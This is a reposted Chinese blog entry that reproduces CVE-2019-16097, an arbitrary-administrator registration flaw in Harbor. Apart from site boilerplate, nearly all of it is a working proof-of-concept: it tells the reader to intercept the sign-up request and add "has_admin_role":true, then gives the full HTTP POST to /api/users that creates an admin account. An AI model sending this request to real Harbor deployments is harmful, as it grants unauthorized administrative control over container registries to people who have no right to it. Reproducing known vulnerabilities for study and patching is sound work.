码上欢乐
相关内容   简体   繁体

Harbor任意管理员注册漏洞复现CVE-2019-16097

本文转载自  查看原文  2019-09-21 10:24  892    渗透测试

注册时抓包

添加poc

"has_admin_role":true

管理员权限

POC

POST /api/users HTTP/1.1
Host: 127.0.0.1
Content-Length: 131
Accept: application/json
Origin: http://127.0.0.1
User-Agent: Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14
Content-Type: application/json
Referer: http://127.0.0.1/harbor/sign-in
Accept-Language: zh-CN,zh;q=0.9
Cookie: sid=5bb9aad90164bd2ed5274edaf20f9c81
Connection: close

{"username":"mrhonest","email":"mrhonest@qq.com","realname":"mrhonest","password":"111111Aaa","comment":"11111","has_admin_role":true}


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 Harbor任意管理员注册漏洞复现 CVE-2019-0708漏洞复现 CVE-2019-17558漏洞复现 CVE-2019-0708漏洞复现 CVE-2019-0708漏洞复现 CVE-2019-15107漏洞复现 dedecms 最新版本修改任意管理员漏洞 0day [漏洞复现]CVE-2019-14287 sudo提权漏洞 CVE-2020-11107:XAMPP任意命令执行漏洞复现 CVE 2019-0708漏洞复现防御修复
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM